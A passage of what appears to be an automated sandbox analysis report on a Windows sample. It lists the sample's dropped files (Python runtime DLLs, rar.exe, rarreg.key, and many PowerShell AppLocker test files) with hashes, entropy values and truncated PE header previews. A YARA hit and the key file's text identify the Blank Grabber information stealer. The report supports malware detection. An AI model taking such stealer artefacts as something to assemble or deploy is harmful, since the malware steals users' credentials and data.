                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q&..5Gq.5Gq.5Gq.<?.9Gq.z;p.7Gq..5p.7Gq.z;t.9Gq.z;u.=Gq.z;r.1Gq..;p.6Gq.5Gp..Fq..;u..Gq..;q.4Gq..;..4Gq..;s.4Gq.Rich5Gq.........PE..d...O{.c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1703192
                                                                                                                                                                                                                                      Entropy (8bit):7.99345904201227
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:49152:WPriKJ8yzQEPulEmHpCI0oykGS7i97GZoZwwH:WTnJ9dP4pCwGS7ca
                                                                                                                                                                                                                                      MD5:1E76961CA11F929E4213FCA8272D0194
                                                                                                                                                                                                                                      SHA1:E52763B7BA970C3B14554065F8C2404112F53596
                                                                                                                                                                                                                                      SHA-256:8A0C27F9E5B2EFD54E41D7E7067D7CB1C6D23BAE5229F6D750F89568566227B0
                                                                                                                                                                                                                                      SHA-512:EC6ED913E0142A98CD7F6ADCED5671334EC6545E583284AE10627162B199E55867D7CF28EFEAADCE9862C978B01C234A850288E529D2D3E2AC7DBBB99C6CDE9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.K.*.K.*.K.*...+.I.*.....E.*.../.G.*.....C.*...).O.*.B..Q.*...+.@.*.K.+...*..'..*..*.J.*....J.*..(.J.*.RichK.*.........................PE..d....~.c.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.@0...........^......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):630736
                                                                                                                                                                                                                                      Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                                      Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                      SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                      Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\select.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):26392
                                                                                                                                                                                                                                      Entropy (8bit):7.437601223014864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:GjW1JCOzGpJbNIJQG4t5YiSyvxPxWEUn:GjW1UOzcbNIJQG4z7SypPx
                                                                                                                                                                                                                                      MD5:938C814CC992FE0BA83C6F0C78D93D3F
                                                                                                                                                                                                                                      SHA1:E7C97E733826E53FF5F1317B947BB3EF76ADB520
                                                                                                                                                                                                                                      SHA-256:9C9B62C84C2373BA509C42ADBCA01AD184CD525A81CCBCC92991E0F84735696E
                                                                                                                                                                                                                                      SHA-512:2F175F575E49DE4B8B820171565AEDB7474D52AE9914E0A541D994FF9FEA38971DD5A34EE30CC570920B8618393FC40AB08699AF731005542E02A6A0095691F0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..t'..t'..t'..'..t'..u&..t'..q&..t'..p&..t'..w&..t'/.u&..t'..u'..t'..u&..t'/.y&..t'/.t&..t'/..'..t'/.v&..t'Rich..t'................PE..d....~.c.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):622352
                                                                                                                                                                                                                                      Entropy (8bit):7.993428024023682
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:12288:jcQhjMZ2NosDnfPgxpVDnL9+pkqVtb6pS6cVgvva/lVpsFEL7:jcac29DnHgxXnL9+Hd6pSlqa/so7
                                                                                                                                                                                                                                      MD5:ABE8EEC6B8876DDAD5A7D60640664F40
                                                                                                                                                                                                                                      SHA1:0B3B948A1A29548A73AAF8D8148AB97616210473
                                                                                                                                                                                                                                      SHA-256:26FC80633494181388CF382F417389C59C28E9FFEDDE8C391D95EDDB6840B20D
                                                                                                                                                                                                                                      SHA-512:DE978D97C04BAD9EBB3F423210CBCB1B78A07C21DAADC5C166E00206ECE8DCD7BAAC1D67C84923C9CC79C8B9DFBEC719CE7B5F17343A069527BBA1A4D0454C29
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0;..QU..QU..QU..)..QU..-T..QU..-P..QU..-Q..QU..-V..QU..)T..QU..QT.RQU..-]..QU..-U..QU..-...QU..-W..QU.Rich.QU.........PE..d......c.........." ...". ...0............................................................`.............................................d"......................D...........x...........................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc....0..........."..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):302872
                                                                                                                                                                                                                                      Entropy (8bit):7.986888079278574
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:Vk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kio:VkUfQJbUV2MhCwEQc5Np9zo
                                                                                                                                                                                                                                      MD5:908E8C719267692DE04434AB9527F16E
                                                                                                                                                                                                                                      SHA1:5657DEF35FBD3E5E088853F805EDDD6B7B2B3CE9
                                                                                                                                                                                                                                      SHA-256:4337D02A4B24467A48B37F1CCBCEBD1476FF10BDB6511FBB80030BBE45A25239
                                                                                                                                                                                                                                      SHA-512:4F9912803F1FA9F8A376F56E40A6608A0B398915B346D50B6539737F9B75D8E9A905BEB5AACE5FE69BA8847D815C600EB20330E79A2492168735B5CFDCEFF39A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t.t.t.}...r.;...v.;...y.;...|.;...w.....w.?...v.t.%.....u.....u...y.u.....u.Richt.........................PE..d....~.c.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hjbsahr.pej.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xwlonmx.qmd.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20c5lpbg.g1f.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2i24po3r.pxy.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awo1d4qz.oqn.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csa0ztdl.ojv.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxtorsl1.hnb.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fklturrz.2b4.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjvqvghh.he2.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4eohyps.vt3.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignvbpfu.vjh.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jshf0xnp.e13.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5sl3url.0bt.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orc12pa4.0qo.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
